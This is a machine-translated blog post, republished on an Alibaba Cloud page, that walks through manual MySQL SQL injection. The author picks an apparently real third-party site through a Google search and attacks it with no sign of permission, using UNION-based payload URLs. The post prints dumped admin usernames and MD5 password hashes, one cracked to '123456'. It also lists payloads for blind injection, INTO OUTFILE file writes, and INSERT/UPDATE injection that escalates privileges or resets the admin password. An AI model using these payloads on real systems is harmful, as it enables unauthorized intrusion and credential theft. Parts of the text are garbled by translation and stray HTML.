SQL injection collation used in MySQL

Last Update:2017-01-13 Source: Internet

Author: User

Tags md5 mysql version sql injection

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

The latest in the study of SQL manual injection, took a website to open the brush. The first is to find a SQL injection point, go to Google to find a random inurl:php?id=

There is a SQL injection point http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228 the link.

The first step is to carry out the injection test. The easiest way to do this is to add and 1=1 to the link and 1=2 if the page is not normal in and 1=2, and if it appears normal under and 1=2, the link has an injection point. The principle is: the statement of the general query is

SELECT * FROM table where id=1

That's what this test is for.

SELECT * FROM table where id=1 and 1=2

Second step, after you find the injection point, guess the number of fields in the current page

Http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+order by 6</pre>
<pre escaped= "true" >http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+order by 7</pre>
<pre escaped= "true" >
Order by 6 displays correctly; Order 7 is not displayed correctly. Description field number is 6
Step three, burst the display bit of the current link

The corresponding number is the display position, showing a bit of 2 and 4</pre>
<pre escaped= "true" >http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+and+1=2+union+select+1,2,3,4,5,6 –-</pre>
<pre escaped= "true" >
The fourth step, burst the basic information of the database.
Http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+and+1=2+union+select+1,2,3,concat (User (), 0x20,database (), 0x20,version ()), 5,6–-
User: People@localhost Database name: People version: 5.0.20a-log
All databases are burst:

Http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat (distinct+ Table_schema), 5,6+from+information_schema.columns--
Burst database name: information_schema,people,test

The INFORMATION_SCHEMA database was created after version 5.0 of MySQL, a virtual database that does not physically exist. The Nformation_schema database is similar to the "Data Dictionary", which provides access to database metadata in the form of data. such as database name or table name, column type, access rights (more granular access). INFORMATION_SCHEMA is a database of database metadata. It stores MySQL's database basic information. and change at any time. Used as an important information provider when viewing information and system decisions.
MySQL version 5.0 and above, we use the INFORMATION_SCHEMA database, to obtain information on other databases. Using the Group_concat () function, the distinct parameter plays a role in removing the repeated display.
The fifth part, according to the database table to burst all database table name:
Http://rsc.XXXx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat (distinct+table_name), 5,6 +from+information_schema.tables+where+table_schema=database ()--

Admin1,answer,check,class,news,system,zhaoping
The page is news.php its database table must be the news table,
The sixth step, burst admin1 the field, then burst the user information, login backstage
The result of the Hex (16) of the admin1 is: 0x61646d696e31
Burst all the fields:
Http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat (distinct+ column_name), 5,6+from+information_schema.columns+where+table_name=0x61646d696e31--

Field: Id,admin,password,rank

And then burst the values in Admin and password:

Http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat (Distinct+id, 0x2b,admin,0x2b,password,0x2b,rank), 5,6+from+admin1--

1+admin+e10adc3949ba59abbe56e057f20f883e+0,
2+87046609+e10adc3949ba59abbe56e057f20f883e+1,
3+87046607+14a026642666897df2fcdcfe821af855+2,
4+87046608+e10adc3949ba59abbe56e057f20f883e+3,
5+87046605+9511364ffd98d4ac7fa9a4804b0e5669+4,
6+87046610+e10adc3949ba59abbe56e057f20f883e+5,
7+87046606+c11948f135f946ff173ca9b5d88465ca+6

The admin password MD5 decrypted to 123456,
It's OK.

This table queries:
[Url=]http://localhost/injection/user.php?username=angel ' [/url] and LENGTH (password) = ' 6
[Url=]http://localhost/injection/user.php?username=angel ' [/url] and left (password,1) = ' m

Union UNION statement:
[url=]http://localhost/injection/show.php?id=1 ' [/url] Union select 1,username,password from user/*
[url=]http://localhost/injection/show.php?id= ' [/url] Union select 1,username,password from user/*

Export File:
[Url=]http://localhost/injection/user.php?username=angel ' [/url] into outfile ' c:/file.txt
[url=]http://localhost/injection/user.php?username= ' [/url] or 1=1 into outfile ' C:/file.txt
[url=]http://localhost/injection/show.php?id= ' [/url] Union select 1,username,password from user into outfile ' c:/ User.txt

Insert statement:
Insert into ' user ' (userid, username, password, homepage, userlevel) VALUES (', ' $username ', ' $password ', ' $homepage ', ' 1 ');
Constructed homepage values are: [url=]http://4ngel.net ' [/url], ' 3 ') #
The SQL statement becomes: Insert into ' user ' (userid, username, password, homepage, userlevel) VALUES (', ' Angel ', ' mypass ', ' Http://4ngel '). Net ', ' 3 ') # ', ' 1 ');

UPDATE statement:
Understand this SQL first
Update user SET password= ' MD5 ($password) ', homepage= ' $homepage ' Where id= ' $id '
If this SQL is modified to the following form, the injection is implemented

1: Modify the homepage value to
[url=]http://4ngel.net ' [/url], userlevel= ' 3
The SQL statement then becomes
Update user SET password= ' mypass ', homepage= ' http://4ngel.net ', userlevel= ' 3 ' Where id= ' $id '
Userlevel for User Level

2: Modify the password value to
Mypass) ' Where username= ' admin ' #
The SQL statement then becomes
Update user SET password= ' MD5 (mypass) ' where username= ' admin ' #) ', homepage= ' $homepage ' where id= ' $id '

3: Modify ID value to
' or username= ' admin '
The SQL statement then becomes
Update user SET password= ' MD5 ($password) ', homepage= ' $homepage ' Where id= ' or username= ' admin '

Common MySQL built-in functions
DATABASE ()
USER ()
System_user ()
Session_user ()
Current_User ()
Database ()
Version ()
SUBSTRING ()
MID ()
CHAR ()
Load_file ()

Summary, for injection is the simplest and most error-prone, for the novice a lot of data is not filtered, for advanced may be server or logic problems.

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More